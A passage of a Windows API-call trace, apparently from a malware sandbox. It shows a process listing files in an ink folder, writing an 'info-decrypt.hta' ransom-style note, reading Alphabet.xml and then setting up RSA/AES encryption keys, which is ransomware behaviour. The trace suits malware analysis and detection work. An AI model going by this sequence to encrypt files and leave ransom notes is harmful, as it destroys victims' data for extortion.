lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0208.146] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0208.147] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0208.148] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0208.148] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0208.148] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0208.148] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.148] FindClose (in: hFindFile=0xb7f590 | out: hFindFile=0xb7f590) returned 1 [0208.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0208.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0208.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0208.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0208.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0208.148] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0208.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0208.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0208.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0208.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0208.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c [0208.149] GetFileType (hFile=0x27c) returned 0x1 [0208.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0208.149] GetFileType (hFile=0x27c) returned 0x1 [0208.150] WriteFile (in: hFile=0x27c, lpBuffer=0x36787b4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x36787b4*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0208.151] WriteFile (in: hFile=0x27c, lpBuffer=0x36787b4*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x36787b4*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0208.151] CloseHandle (hObject=0x27c) returned 1 [0208.151] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0208.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0208.151] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), fInfoLevelId=0x0, lpFileInformation=0x36797d0 | out: lpFileInformation=0x36797d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486)) returned 1 [0208.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0208.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0208.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0208.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0208.251] GetFileType (hFile=0x208) returned 0x1 [0208.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0208.251] GetFileType (hFile=0x208) returned 0x1 [0208.251] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xc1486 [0208.251] ReadFile (in: hFile=0x208, lpBuffer=0x52fb498, nNumberOfBytesToRead=0xc1486, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x52fb498*, lpNumberOfBytesRead=0x6d8edac*=0xc1486, lpOverlapped=0x0) returned 1 [0208.259] CloseHandle (hObject=0x208) returned 1 [0208.259] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf9d0) returned 1 [0208.260] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x3679d10 | out: pbBuffer=0x3679d10) returned 1 [0208.756] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x36d1438, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f0d0) returned 1 [0208.756] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.756] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.756] CryptDuplicateKey (in: hKey=0xb7f0d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f490) returned 1 [0208.756] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.756] 